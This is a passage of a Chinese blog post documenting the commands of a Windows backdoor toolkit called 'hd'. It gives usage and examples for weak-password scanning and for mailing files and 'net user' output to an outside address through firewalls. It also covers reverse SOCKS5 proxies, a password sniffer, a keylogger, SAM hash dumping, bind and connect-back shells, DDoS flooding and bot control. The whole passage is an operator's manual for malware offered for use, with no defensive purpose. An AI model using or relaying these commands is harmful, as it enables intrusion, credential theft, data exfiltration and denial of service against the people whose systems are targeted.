b. 如果要扫描192.168.0.1-192.168.0.254的SQL和IPC简单密码,用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i
c. 如果要扫描192.168.0.1-192.168.0.254的活动机器的SQL和IPC简单密码,用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i /c

8. 命令行邮件发送器

使用命令: hd -m
帮助信息:
Usage(1.3b1):-m [-switch] [Proxy IP] [Proxy Port]

switch list:
-s      xxx@xxx.com  user define from header
-n      do not attach file
-c      “route print”  user define command
-h      these info
参数解释:
a. 为收信的信箱地址。
b. 为要带的附件,该功能主要是为从内网穿透防火墙传文件到外网而写。
c. [Proxy IP] 为支持邮件转发的SMTP邮件服务器IP地址,或者做了到SMTP邮件服务器的SMTP端口的端口转发的IP地址。
d. [Proxy Port] 为支持邮件转发的SMTP邮件服务器SMTP端口,或者做了到SMTP邮件服务器的SMTP端口的端口转发的转发端口。
e. -s xxx@xxx.com 为定义发件人,有的邮件服务器有反垃圾邮件或需要验证发件人的,用这个定义,默认为随机产生地址。
f. -n 如果不带附件,用这选项。
g. -c “command” 为邮件发送的内容指定为该命令的执行结果,默认为”route print”的执行结果。
h. -h 显示帮助信息。
使用示例:
a. 如果给lion@cnhonker.net 发送 xxx.rar,使用命令为:
hd -m lion@cnhonker.net xxx.rar
b. 如果给 lion@cnhonker.net 发送 xxx.rar,通过 192.168.0.1的99端口进行转发,使用命令为:
hd -m lion@cnhonker.net xxx.rar 192.168.0.1 99
c. 如果给lion@cnhonker.net发送”net user”命令的执行结果而不带附件,使用命令为:
hd -m -n -c “net user” lion@cnhonker.net

9. 包转发功能

使用命令: hd -p
帮助信息:
[Usage of Packet Transmit:]
-p -listen ConnectPort TransmitPort
-p -tran   ConnectPort TransmitHost TransmitPort
-p -slave  ConnectHost ConnectPort TransmitHost TransmitPort

[Option:]
-log logfile
参数解释:
1. -listen 监听功能。支持 本机监听端口 <-> 本机转发端口 的转发。
2. -tran 简单端口转发功能。支持 本机端口 <-> 转发机器:转发端口 的转发。
3. -slave 双向转发功能。支持 监听机器:监听端口 <-> 转发机器:转发端口 的转发。
4. -log 支持日志记录。可以记录转发时的数据包内容。

10. Socks5功能

使用命令: hd -s
帮助信息:
[Usage of Socks5 Proxy:]
-s -bind [ReBindIP] [BindPort]              Default:ALL 8009
-s -connect ConnectHost [ConnectPort]       Default:80
-s -listen [ConnectPort] [ListenPort]       Default:80 8009

[Option:]
-log logfile
参数解释:
1. -bind 监听功能。为创建一个端口进行Socks5服务,支持端口重定向。
2. -connect 反连Socks5功能。
3. -listen 双向转发功能。为反连Socks5连接的端口。
4. -log 支持日志记录。可以记录数据包内容。
使用示例:
1. 端口重用Socks5:
hd -s -bind 10.10.10.222 80
注: 这里的IP不要使用127.0.0.1,而应该使用一个网卡接口的IP。
2. 反连Socks5示例:
a. 在你接受反连的那台机器运行:
hd -s -listen 80 8009
b. 在反连那台机器运行:
hd -s -connect 接受反连IP 80
如: hd -s -connect 10.10.10.222 80
c. 使用SocksCap之类的连接接受反连IP机器的ListenPort即可。 上例为8009。
如果连接Listen服务器不成功,Connect 10分钟后才会连接第二次。

11. 命令行Sniffer帮助信息

使用命令: hd -x
帮助信息:
[Usage of Sniffer:]
-x [Option]
[Option]
/h          Show Help
/t          Output TCP  Packets
/u          Output UDP  Packets
/i          Output ICMP Packets
/p          Decode Packets (default OFF)
/v          Output Packets Info
/l          Output Password Strings (default ON, save to:hdsys.dat)
/c          Close Console (Hide Mode)
/b:BindIP   Sniffer Bind IP (default ALL)
/f:FromIP   Output Packets FromIp=fromIP (default ALL)
/d:DestIP   Output Packets DestIp=destIP (default ALL)
/s:String   Output Packets Include sensitive String(TCP only)
/o:Port     Output Packets from or to the port(ICMP is TYPE)
参数解释:

12. 其他功能

使用命令: hd -o
帮助信息:
[Usage of Tools:]
-bind           Bind Shell                   // 监听一个Shell
-client         Backdoor Client              // 后门客户端功能
-config         Config Parameter             // 后门配置功能
-connect        ConnectBack Shell            // 反连一个Shell
-ddos           DDoS Attack                  // 拒绝服务功能
-enum           Enum+                        // Enum功能
-enumhost       Enum Network Hosts           // 列举网络机器
-findpass       Find User Password           // 查找密码
-fport          Port to File and Process     // 端口对应进程
-hash           HBot PassHash                // 产生HBot的登陆hash
-hbs            Port Banner Scanner          // 命令行端口banner扫描器
-hget           Get HTTP/FTP File            // 命令行下载文件
-hmb            Domain MX Banner Finder      // Domain MX Banner获取器
-hscan          Ping/Name/SQL/IPC Scanner    // 命令行Ping/Name/SQL/IPC扫描器
-keylog         Keyboard Log                 // 命令行键盘记录器
-logoff         Logoff Windows               // 注销系统
-msn            MSN Password Decode          // MSN注册表密码解码
-packet         Packet Transmit              // 包转发功能
-pcanywhere     Pcanywhere Password File Decode // pcanywhere 密码文件解码
-pskill         Kill a Process               // 杀掉进程
-pslist         List Process                 // 查看进程
-pwdump         SAM Password Hash Dumper     // 注册表SAM密码HASH获取器
-reboot         Reboot System                // 重启系统
-safedel        Safe Delete File             // 安全删除文件功能
-server         Create a Server              // 创建一个后门Server
-service        Services Operate             // 服务操作功能
-shutdown       Shutdown System              // 关闭系统
-smail          Command Line SendMail        // 命令行邮件发送器
-sniffer        Command Line Sniffer         // 命令行Sniffer
-socks5         Socks5 Proxy                 // Socks5代理功能
-su             Like UNIX su Tool
-sysinfo        System Info                  // 显示系统信息
-telnet         Telnet to Target             // Telnet功能
-vnc            VNC Password Decode          // VNC 注册表密码解码

四. 后门内置shell命令使用方法介绍 (后门Shell里运行命令将得到详细的在线帮助)

1. 后门管理

a. HELP/H/MAN/?

命令解释: 显示后门帮助
帮助信息:
[Help Message:]

后门管理
==================================================
?/H/HELP/MAN      Show this Message
CLIENT/HC         Backdoor Client
CONFIG            Config the Parameter
EXIT              Exit Shell
ID                Show Door ID
KICK              Kick Shell
NOP/NOOP          Keep Active
RELOAD            Reload Config Data
REMOVE            Remove this Program
SHOW              Show Config Data
UPDATE            Update Backdoor
VER/VERSION       Show Version Message
WHO/ONLINE        List Client

文件目录操作
————————————————–
CD                Change Directory
COPY/CP           Copy file or Directory
DEL/RM/RD         Delete file or Directory
DIR/LS/LIST       List file and Directory
FIND              Find file
MOVE/MV           Move file or Direcotry
MD/MKDIR          Create Directory
PWD               Get Current Dirctory
REN/RENNAME       Renname file or Directory
SDEL/SAFEDEL      Safe Delete File or Direcotry
TYPE/CAT          Type text file

执行程序操作
————————————————–
CMD/DOS/SHELL     Switch to MS-DOS Mode
EXE               CreateProcess run file
EXEC              Winexec run file
OPEN              ShellExecute run file
SYSTEM            System run file

系统操作
————————————————–
DATE              Show Date and Time
LOCK/UNLOCK       Lock/Unlock the mouse
LOGOFF            Logoff System
REBOOT            Reboot System
SHUTDOWN          Shutdown System
SYS/INFO          View System info

后门Shell操作
————————————————–
BIND              Bind Shell
CONNECT           ConnectBack Shell
SERVER            Create a Server
TELNET/LOGIN      Telnet to Target

代理操作
————————————————–
KILLPROXY/KP      Kill a TCP Proxy
LISTPROXY/LP      List all TCP Proxy
PROXY/HTRAN       Create a TCP Proxy

拒绝服务操作
————————————————–
DDOS/HGOD         DDoS Attack
KILLDDOS/KD       Kill a DDoS Attack
LISTDDOS/LD       List all DDoS Attack

附加功能操作
————————————————–
CLIP              Get Clipboard Text
FINDPASS          Find User Password
FPORT             Port to Process
GET/PUT           Get or Put file.(Please use Client)
HASH              HBot PassHash
HBOT              HBot Cortrol
HBS               Port Banner Scanner
HGET              Get the file from HTTP or FTP
HMB               Domain MX Banner Finder
I3389/S3389       Install Termsrv, Show & Set Port
KEYLOG/STOPK      Start/Stop Keyboard Log
PCANYWHERE        PCAnywhere Password file Decode
PSKILL/KILL       Kill the Process
PSLIST/PS         List all Process
PWDUMP            SAM Password Hash Dumper
SCREEN            Capture Screen
SERVICE           All Service Operate
SMAIL             Send a Mail
SNIFFER/STOPS     Start/Stop Password Sniffer
SU                Like UNIX su Tool
VNC               VNC Password Decode
==================================================

b. CLIENT/HC

命令解释: 后门客户端功能
帮助信息:
[Usage of Door Client:]
client [Option]
client -shell [Sniffer BindIP]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 1025.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
client 192.168.0.1 “”bind 99″”
client 192.168.0.1 “”bind 99″” -m:tcp -l:1025 -p:80 -s:192.168.0.2
client 192.168.0.1 “”connect 192.168.0.2 53″”
client hosts.txt   “”hgod 192.168.0.2 80″”

c. CONFIG

命令解释: 后门配置
帮助信息:
[Usage of Config:]
config -show
config -type      <0,1,2,3,4>
config -id        
config -port      
config -url       [SleepTime]
config -cb         [SleepTime]
config -hbot       [ChannelPass]
config -time      
config -ip        
config -log      
config -ddostype  <0,1,2,3,4>
config -ddos      
config -sockstype <0,1,2,3>
config -bind      [ReBindIP]
config -connect  
config -listen    
————————————————–
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
d. EXIT

命令解释: 退出后门Shell

e. ID

命令解释: 显示后门ID()
使用帮助:
1. DoorShell里可以用Config -id 进行配置。
2. CMDShell里可以用hd -c -id 进行配置。

f. KICK

命令解释: 踢掉Shell
帮助信息:
Usage of Kick:  kick
参数解释:
1. 为用WHO/ONLINE命令列举出所有Shell的ID条目编号。
2. 为踢掉除当前连接外的所有Shell。

g. NOP/NOOP

命令解释: 空操作,保持连接

h. RELOAD

命令解释: 重新装入配置

i. REMOVE

命令解释: 删除后门

j. SHOW

命令解释: 查看后门配置

k. UPDATE

命令解释: 升级后门
使用帮助:
Usage of Update:    update [reinstall]

l. VER/VERSION

命令解释: 显示后门版本信息

m. WHO/ONLINE

命令解释: 查看在线Shell

2. 文件目录操作

a. CD

命令解释: 切换目录
帮助信息:
Usage of CD: cd

b. COPY/CP

命令解释: 拷贝文件或目录
帮助信息:
Usage of Copy: copy

c. DEL/RM/RD

命令解释: 删除文件或目录
帮助信息:
Usage of Delete: del

d. DIR/LS/LIST

命令解释: 查看文件列表
帮助信息:
Usage of Dir: dir [FileName|DirectoryName]

e. FIND

命令解释: 查找文件
帮助信息:
Usage of Find: find

f. MOVE/MV

命令解释: 移动文件或目录
帮助信息:
Usage of Move: move

g. MD/MKDIR

命令解释: 创建目录
帮助信息:
Usage of Mkdir: mkdir

h. PWD

命令解释: 查看当前目录

i. REN/RENNAME

命令解释: 改名文件或者目录
帮助信息:
Usage of Rename: ren

j. SDEL/SAFEDEL

命令解释: 安全删除文件或者目录
帮助信息:
Usage for Safe Delete Files:
safedel [-p passes] [-s] [-q]
safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes  Specifies Number of Overwrite Passes (Default:1)
-s         Recurse Subdirectories
-q         Don’t print errors (Quiet)
-z         Clean Free Space

k. TYPE/CAT

命令解释: 查看文本文件
帮助信息:
Usage of TypeFile: type

3. 执行程序操作

a. CMD/DOS/SHELL

命令解释: 切换到cmd shell

b. EXE

命令解释: 用CreateProcess()运行文件,并显示结果。(可以在cmd.exe不存在的时候使用)
帮助信息:
Usage of Exe: exe [Parameter]

c. EXEC

命令解释: 用Winexec()运行文件
帮助信息:
Usage of Exec: exec

d. OPEN

命令解释: 用ShellExecute()运行文件
帮助信息:
Usage of Open: open

e. SYSTEM

命令解释: 用System()运行文件
帮助信息:
Usage of System: system

4. 系统操作

a. DATE

命令解释: 显示系统当前日期和时间

b. LOCK/UNLOCK

命令解释: 锁定/解除锁定鼠标

c. LOGOFF

命令解释: 注销系统

d. REBOOT

命令解释: 重启系统

e. SHUTDOWN

命令解释: 关闭系统

f. SYS/INFO

命令解释: 查看系统信息

5. 后门Shell操作

a. BIND

命令解释: 创建一个bind Shell到指定端口
帮助信息:
Usage of Bind: bind

b. CONNECT
命令解释: 反连一个Shell到指定IP的端口
帮助信息:
Usage of Connect: connect

c. SERVER
命令解释: 创建一个能多次连接的BindShell到指定端口
帮助信息:
Usage of Server: server

d. TELNET/LOGIN
命令解释: 远程连接,可用于登陆另一个监听Shell
帮助信息:
Usage for Telnet: telnet

6. 代理操作

a. KILLPROXY/KP

命令解释: 终止代理任务
帮助信息:
Usage of Stop a Proxy: killproxy

b. LISTPROXY/LP

命令解释: 列举代理任务

c. PROXY/HTRAN

命令解释: 创建代理任务
帮助信息:
[Usage of Socks5 Proxy:]
htran -bind [RebindIP] [BindPort]              Default:8009
htran -connect ConnectHost [ConnectPort]       Default:80
htran -listen [ConnectPort] [ListenPort]       Default:80 8009

[Usage of Packet Transmit:]
htran -listen2 ConnectPort TransmitPort
htran -tran ConnectPort TransmitHost TransmitPort
htran -slave ConnectHost ConnectPort TransmitHost TransmitPort

7. 拒绝服务攻击操作

a. DDOS/HGOD

命令解释: 创建拒绝服务攻击任务
帮助信息:
[Usage of DDoS Attack:]
ddos [Option]
       Flooding Host IP|Hostname.
    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 50, Default is 2.

b. KILLDDOS/KD

命令解释: 终止拒绝服务攻击任务
帮助信息:
Usage of stop a DDoS Attack: killddos

c. LISTDDOS/LD

命令解释: 列举拒绝服务攻击任务

8. 其他功能操作

a. CLIP

命令解释: 查看剪切板内容

b. FINDPASS

命令解释: 查找内存中的管理员密码

c. FPORT

命令解释: 端口对应进程

d. GET/PUT

命令解释: 上传下载文件(必须使用后门客户端连接才可用)
帮助信息:
get [localfiename]
put [localfiename]

e. HASH

命令解释: 产生HBot登陆Hash
帮助信息:
Usage of HBot Hash: hash

f. HBOT

命令解释: 开始/停止 HBot任务
帮助信息:
Usage of HBot:
hbot -stop
hbot -start [Channel] [Server] [ServerPort] [ChannelPass] [ServerPass]

g. HBS

命令解释: 端口Banner扫描器
帮助信息:
[Usage:]
hbs [Options]

[Options:]
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d      TCP connect timeout, between 1-20, default is 5
/l    Log file name, default is hbs.txt
/p       Scan port, default is 25
/s     Scan sensitive string
/t     Scan thread number, between 1-1000, default is 200

h. HGET

命令解释: FTP/HTTP文件下载
帮助信息:

Usage of HGet: hget [run]

hget http://www.xxx.com/test.exe test.exe run
hget ftp://user:pass@ftp.xxx.com/test.exe test.exe

i. HMB

命令解释: 域名MX记录SMTP banner扫描器
帮助信息:
Usage of Domain MX Banner: hmb

j. HSCAN

命令解释: 命令行Ping/Name/SQL/IPC扫描器
帮助信息:
[Usage:]
-hscan [Options]

[Options:]
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d      Set timeout, between 1-20, default is 5
/l    Log file name, default is hscan.txt
/t     Scan thread number, between 1-1000, default is 200
注: 服务状态下IPC扫描不能用, 如果需要请用su切换到普通用户模式使用命令行扫描

j. I3389/S3389

命令解释: 安装终端服务/查看或设置终端端口
帮助信息:
Usage install 3389: i3389 [port]
Usage Show or Set 3389 Port: s3389 [port]

k. KEYLOG/STOPK

命令解释: 开始/停止键盘记录

l. PC/PCANYWHERE

命令解释: pcanywhere密码文件解码
帮助信息:
Usage of pcanywhere: pcanywhere <*.cif>

m. PSKILL/KILL

命令解释: 终止进程
帮助信息:
Usage of Pskill: pskill

n. PSLIST/PS

命令解释: 列举进程

o. PWDUMP

命令解释: 获取注册表SAM密码HASH

p. SCREEN

命令解释: 抓屏
帮助信息:
Usage of Screen: screen

q. SERVICE

命令解释: 服务操作
帮助信息:
[Usage of Service:]
service -
Tags: , , ,
Tools | Comments(0) | Trackbacks(0) | Reads(8679)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive